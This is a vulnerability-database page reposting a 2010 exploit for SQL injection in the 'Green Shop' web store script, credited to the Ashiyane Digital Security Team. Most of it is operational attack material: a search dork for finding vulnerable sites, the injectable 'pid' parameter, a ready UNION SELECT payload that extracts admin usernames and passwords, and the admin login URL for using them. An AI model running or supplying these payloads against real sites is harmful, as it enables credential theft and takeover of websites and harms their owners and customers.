Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackPrinceofHackingEXPLOITPACK:5D9159947E5B7B7C63B89D9A5809CE90
HistoryJul 07, 2010 - 12:00 a.m.

Green Shop - SQL Injection

2010-07-0700:00:00
PrinceofHacking
10
JSON

Green Shop - SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D0rk: "egreen.ir"


Exploit:
http://site.org/index.php?pid=[SQLi]

Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--

Login Page :
http://site.org/admin/login.php


Special Tnx : All Ashiyane Members
JSON